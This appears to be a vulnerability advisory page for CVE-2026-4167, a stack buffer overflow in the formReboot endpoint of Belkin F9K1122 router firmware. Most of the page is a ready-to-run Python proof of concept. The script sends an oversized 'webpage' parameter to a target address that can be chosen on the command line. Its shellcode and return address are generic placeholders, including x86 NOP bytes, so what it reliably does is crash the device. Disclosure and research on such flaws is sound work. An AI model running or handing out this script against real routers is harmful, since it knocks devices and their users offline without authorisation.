Security Vulnerability Report
CVE-2026-4167 CVSS 8.8 HIGH

Published: 2026-03-16 14:19:56
Last Modified: 2026-04-22 21:30:26

Description

A vulnerability was found in Belkin F9K1122 1.00.33. It affects the function formReboot of the file /goform/formReboot. Manipulating the argument webpage causes a stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Belkin F9K1122 firmware version 1.00.33 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-4167 PoC - Belkin F9K1122 formReboot Stack Buffer Overflow

Note: This PoC is for educational and security research purposes only.
Unauthorized access to systems without permission is illegal.
"""

import requests
import sys

TARGET = "http://192.168.1.1"  # Router IP address
TARGET_URL = f"{TARGET}/goform/formReboot"


def create_exploit_payload():
    """
    Create malicious payload for stack buffer overflow
    Adjust payload based on target firmware analysis
    """
    # Buffer overflow payload - may need adjustment based on target
    # NOP sled + shellcode + return address overwrite
    padding = b"A" * 1000  # Overflow length - adjust based on analysis

    # Example: Overwrite return address with jump instruction
    return_address = b"\x42\x42\x42\x42"  # Placeholder - need to find correct address

    # NOP sled for reliability
    nop_sled = b"\x90" * 100

    # Minimal shellcode for demonstration (executes /bin/sh or calc)
    # This is a placeholder - use appropriate shellcode for target architecture
    shellcode = b"\xcc" * 50  # INT3 breakpoint for testing

    payload = padding + return_address + nop_sled + shellcode
    return payload


def exploit():
    """Send exploit payload to vulnerable endpoint"""
    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Generating exploit payload...")

    payload = create_exploit_payload()

    # Construct request data
    data = {
        "webpage": payload.decode('latin-1'),  # Send as form parameter
        "submit_button": "Reboot"
    }

    try:
        print("[*] Sending exploit request...")
        response = requests.post(TARGET_URL, data=data, timeout=10)
        print(f"[!] Response status: {response.status_code}")
        print(f"[!] Router may be rebooting or crashed")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        if "Connection" in str(e):
            print("[+] Target may have crashed - exploit successful")


if __name__ == "__main__":
    print("CVE-2026-4167 PoC - Educational Use Only")
    if len(sys.argv) > 1:
        TARGET = sys.argv[1]
        TARGET_URL = f"{TARGET}/goform/formReboot"
    exploit()
